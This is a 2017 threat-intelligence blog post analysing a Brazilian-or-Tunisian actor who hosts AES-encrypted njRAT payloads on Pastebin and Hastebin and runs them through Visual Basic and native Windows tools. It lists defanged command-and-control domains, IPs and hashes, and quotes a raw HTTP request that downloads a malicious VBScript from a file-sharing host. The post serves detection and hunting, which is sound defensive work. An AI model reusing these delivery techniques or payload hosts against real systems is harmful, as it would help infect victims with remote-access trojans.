Blog

Stringing Victims Along: Leveraging Paste Sites to Bypass Security Controls

Posted: 24th May 2017
By: LEVI GUNDERT

insikt-group-logo-alt.png

Jan Sparud, PhD also contributed to this analysis.

Key Takeaways

  • The actor self-named Leo uses encrypted strings and the public cloud to perform multi-stage malware attacks.
  • The attacks appear to be opportunistically motivated, though official motivation for RAT propagation is unknown.
  • Leo begins with allegedly self-written Visual Basic code that fetches remote strings, which after decryption, are malicious binaries (Trojans) run via native Windows tools.
  • The above tactics put renewed emphasis on endpoint visibility and detection, specifically around native Windows tools and processes in memory.
  • Leo’s TTPs provide strategic threat intelligence, leading to improved risk scores based on knowledge of current controls.

hunting-paste-sites-1.jpg

Introduction

A recent hunting excursion for obfuscated strings in Recorded Future led to a malware example that highlights the cleverness of adversaries and the channels they choose to attempt remote infection. The malware campaign is a tale of commodity criminal code and strings stored in the cloud for hiding a file’s nature and purpose. The following narrative identifies and dissects a specific adversary’s tools and tactics to assist in thinking through current security control efficacy and future risk to a business.

Hunting Results

On February 13, 2017, Recorded Future observed a Visual Basic program posted in Pastebin — pastebin[.]com/vHuaWqqj (always cached in Recorded Future) — that is a useful example for several reasons.

hunting-paste-sites-2.png

Hunting obfuscated strings in paste sites. The Visual Basic program:

  • Imports a cryptography library
  • References dwm.exe (Windows Desktop Manager)
  • Invokes “_WScript.Shell_”
  • Downloads a string from hxxps://hastebin[.]com/raw/aceloridux
  • Decrypts the AES string

The string fetched from Hastebin (the string appears in the appendix; the page has since been deleted) is decrypted three different times in the bindings of the variables: Load, EntryPoint, and invoke. In all three cases the encrypted string is the name of the variable.

hunting-paste-sites-3.jpg

The Remote Access Trojan

Fully decrypting the string (see Appendix for the Recorded Future Python script), produces a binary file that ends with XPADDINGXPADDING. The file is classified by ReversingLabs as njRAT with the following meta data:

MD5 cb37dd7af56fed813a0f305fff322d20
SHA1 8b970987cc739cbb156fd8c0c2a724458c467505
SHA256 8520e4dcc580a9615d61f28a6f11c521444f2aed05c6f0aebb65f1d7392de429
SHA512 2c34633d921d0d31768e8fe9d69b5db66330ab95396b42716f1a6e1f465dc722d6b9702
6f7223785bc361776df68fde79a9cfd810459b6052bb1b9181179a287
IMPHASH d41d8cd98f00b204e9800998ecf8427e
SSDEEP 384:qlubpizcmfdfsjrqbslrgsixyvl46pg/i8bd9fmrvr6jzlbw8hqiuszzz0ho:fomhti+rpcnuy

ReversingLabs’s runtime analysis of the njRAT sample produces DNS traffic to _wwwgooglecom.sytes[.]net_and genesis96[.]no-ip.biz. A Recorded Future search for wwwgooglecom.sytes[.]net reveals an found here) that produces DNS traffic to the same wwwgooglecom.sytes[.]net domain.

The Recorded Future Intelligence Card™ for genesis96.no-ip[.]biz returns three A record IP addresses from FarSight Security’s passive DNS (pDNS). The records begin in 2010, and include:

  • 69.65.19.166 (Gigenet – Illinois, US)
  • 41.226.244.46 (Agence Tunisienne Internet – Tunis, Tunisia)
  • 197.0.70.48 (Agence Tunisienne Internet – Tunis, Tunisia)

hunting-paste-sites-4.png

Farsight Security results in the Recorded Future Intelligence Card™ for genesis96.no-ip[.]biz. Historical DNS A record IP addresses for wwwgooglecom[.]sytes[.]net are almost universally owned by Brasil Telecom. Using Recorded Future’s API to enrich the list of historical DNS A record IP addresses quickly produces additional leads.

hunting-paste-sites-5.png

Quickly enriching a list of IP addresses for additional context. The first result is for 177.2.158.50. The IP appears in a deleted paste that may identify the actor’s (“leo”) workstation. The author is wzLeonardo, the same author of the original Visual Basic script.

hunting-paste-sites-6.png

A Recorded Future search for wzLeonardo produces an Intelligence Card™ for wzleonardo258.no-ip[.]org. The first reference to the domain originates from Payload Security’s hybrid-analysis.com, for a portable executable file.

hunting-paste-sites-7.png

Source: Payload Security

It appears the malicious file is masquerading as a Clash of Clans (a popular online game) bot based on the file name and icon. According to Hybrid Analysis, the file invokes wscript.exe to run the Visual Basic script located at %TEMP%\VB.vbs as dwm.exe, and adds a local firewall rule via netsh.exe to allow dwm.exe to run with a new process ID.

The Visual Basic script is fetched from a Hungarian file sharing site, ddl3.data[.]hu. Specifically, an HTTP GET request:

GET /get/0/9952995/VB.vbs.vbs HTTP/1.1 Host: ddl3.data.hu Connection: Keep-Alive

After successfully executing the Visual Basic script, the rogue dwm.exe process initiates a TCP connection to the host at _wzleonardo258.no-ip[.]org_on port 2222.

hunting-paste-sites-8.jpg

The Recorded Future wzleonardo258.no-ip[.]org Intelligence Card™ contains Farsight Security extension results including 63 DNS A record changes in 2016 (the IP address list is included in the IOC section). The ReversingLabs extension contains four additional samples that also initiate traffic to wzleonardo258.no-ip[.]org. Additionally, ReversingLabs has 278 malware samples that initiate traffic to ddl3.data[.]hu.

hunting-paste-sites-9.png

wzleonardo258.no-ip[.]org results via ReversingLabs Intelligence Card™ extension.

The Actor — wzLeonardo

The most recent paste result for wzLeonardo includes a YouTube link where the actor demonstrates a process for “crypting” a RAT to bypass anti-virus software on victim systems. The actor (Leo) appears to be motivated by profit, and the actor’s Skype profile lists Brazil for the location. Leo may be Tunisian based on clues in the YouTube video, and the A record IP addresses resolving to _genesis96.no-ip[.]biz_in 2010.

hunting-paste-sites-10.png

Recorded Future analyst view of wzLeonardo’s paste activity.

hunting-paste-sites-11.png

Recorded Future cached paste includes the Skype moniker “el30n4d0.”

Future Hunting

Creating lists of Visual Basic constructs such as a variable declaration in combination with references invoking obfuscation and/or encryption is a useful Recorded Future hunting methodology for identifying malicious Visual Basic programs. (Dim [previously referred to “dimension of an array,” but currently equates to declaring a variable] is difficult to avoid in Visual Basic).

hunting-paste-sites-12.png

Timeline of hunting obfuscated/encrypted strings.

Conclusion

The actor self-named Leo is a specific example of a criminal exploiting cloud services and native Windows tools for fun and assumed profit. Leo’s tactic is writing Visual Basic code to fetch additional binaries in the form of encrypted strings from file/paste sharing sites and executing those strings (binaries) via Windows tools like wscript.exe and cmd.exe.

Leo represents a trend moving away from fetching binaries on victim machines in native (e.g., .exe) or compressed (e.g., .zip or .rar) form. The relatively new technique involves storing and retrieving malicious code in obfuscated and/or encrypted strings. This puts defensive emphasis on the endpoint and the need for granular visibility into native Windows tools and memory.

In this case services like Pastebin, Hastebin, and Data.hu were used, but popular public cloud providers like Google, Microsoft, Amazon, Alibaba, etc. are also favorites which renders defensive domain whitelisting less effective.

Strategic threat intelligence gained from actors like Leo creates opportunities for improved risk scores and estimated future financial loss, triggering derivative opportunities to assess current controls and requisite spending on additional controls where needed.

View the full list of IOCs related to this analysis.

Related